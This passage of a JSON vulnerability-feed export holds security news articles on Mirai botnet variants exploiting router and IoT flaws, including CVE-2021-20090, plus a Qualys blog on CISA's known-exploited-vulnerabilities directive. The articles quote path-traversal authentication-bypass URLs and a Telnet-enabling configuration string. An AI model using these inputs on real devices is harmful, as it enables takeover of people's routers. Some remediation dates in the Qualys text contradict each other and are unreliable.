register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:57:46", "type": "threatpost", "title": "Latest Mirai Variant Targets SonicWall, D-Link and IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-03-16T16:57:46", "id": "THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "href": "https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-09T19:54:43", "description": "An 
authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. 
For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. 
Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to their arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their router's firmware.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. 
\u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", 
"CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-RHtuGy5HftM/YFCJDLIpWjI/AAAAAAAACCw/pM55oGojHcUHm6M2-ZX9QAX6Z-Nm1z4UACLcBGAsYHQ/s0/botnet.jpg>)\n\nCybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet connected devices.\n\n\"Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,\" Palo Alto Networks' Unit 42 Threat Intelligence Team [said](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in a write-up.\n\nThe rash of vulnerabilities being exploited include:\n\n * [VisualDoor](<https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/>) \\- a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January\n * [CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>) \\- a D-Link DNS-320 firewall remote code execution (RCE) vulnerability\n * [CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>) \\- Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges\n * [CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>) \\- an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40\n * [CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) \\- a Netis WF2419 wireless router RCE exploit, and\n 
* [CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>) \\- a Netgear ProSAFE Plus RCE vulnerability\n\n\"The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\" SonicWall said in a statement to The Hacker News. \"It is not viable against any properly patched SonicWall appliances.\"\n\nAlso included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with a separate botnet by the name of [MooBot](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot>).\n\nThe attacks are said to have been detected over a month-long period starting from February 16 to as recent as March 13.\n\nRegardless of the flaws used to achieve successful exploitation, the attack chain involves the use of wget utility to download a shell script from the malware infrastructure that's then used to fetch [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) binaries, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks.\n\nBesides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.\n\n\"The IoT realm remains an easily accessible target for attackers. 
Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,\" the researcher said.\n\n### New ZHtrap Botnet Traps Victims Using a Honeypot\n\nIn a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as [Matryosh](<https://thehackernews.com/2021/02/beware-new-matryosh-ddos-botnet.html>).\n\n[](<https://thehackernews.com/images/-uqNg1z1INRs/YFCGXS3KMzI/AAAAAAAACCo/_lMwW_bvOD8a4SK4Ri190P4PBgrM4o2AQCLcBGAsYHQ/s0/botnet-malwar.jpg>)\n\nWhile honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.\n\nIt achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload -\n\n * MVPower DVR Shell [unauthenticated RCE](<https://www.exploit-db.com/exploits/41471>)\n * Netgear DGN1000 Setup.cgi [unauthenticated RCE](<https://www.exploit-db.com/exploits/43055>)\n * [CCTV DVR RCE](<https://www.exploit-db.com/exploits/39596>) affecting multiple vendors, and\n * Realtek SDK miniigd SOAP [command execution](<https://www.exploit-db.com/exploits/37169>) (CVE-2014-8361)\n\n\"ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features,\" the researchers [said](<https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/>). 
\"Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device.\"\n\n[](<https://thehackernews.com/images/-Uzpn4VdFyoE/YFCEwPNpN2I/AAAAAAAACCk/OLQNFZXfk90IMbMQYZNw8YzlN-g5YeszgCLcBGAsYHQ/s0/botnet-malware.jpg>)\n\nOnce it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.\n\nNoting that the attacks began from February 28, 2021, the researchers said ZHtrap's ability to turn infected devices into honeypots marks an \"interesting\" evolution of botnets to facilitate finding more targets.\n\nThese Mirai-based botnets are the latest to spring up on the threat landscape, in part fanned by the availability of Mirai's source code on the Internet since 2016, opening the field wide open for other attackers to build their own variants.\n\nLast March, researchers discovered a Mirai variant called \"[Mukashi](<https://thehackernews.com/2020/03/zyxel-mukashi-mirai-iot-botnet.html>),\" which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named \"[Katana](<https://www.avira.com/en/blog/katana-a-new-variant-of-the-mirai-botnet>),\" which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 Switches.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T10:32:00", "type": "thn", "title": "New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-03-18T03:14:02", "id": "THN:3907AE12F794F0523BEE196D6543A50F", "href": "https://thehackernews.com/2021/03/new-mirai-variant-and-zhtrap-botnet.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of 
an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new 
attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), \"Reducing the Significant Risk of Known Exploited Vulnerabilities.\" [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to the Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. 
You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. 
Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys 
VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [\"CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most \"Category 2\" vulnerabilities by **November 17, 2021**, and \"Category 3\" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help comply with the directive's aggressive remediation date of November 17, 2021. 
Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732','CVE-2020-1350','CVE-2020-1472','CVE-2021-26855','CVE-2021-26858','CVE-2021-27065','CVE-2020-0601','CVE-2021-26857','CVE-2021-22893','CVE-2020-8243','CVE-2021-22900','CVE-2021-22894','CVE-2020-8260','CVE-2021-22899','CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve that compliance. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * 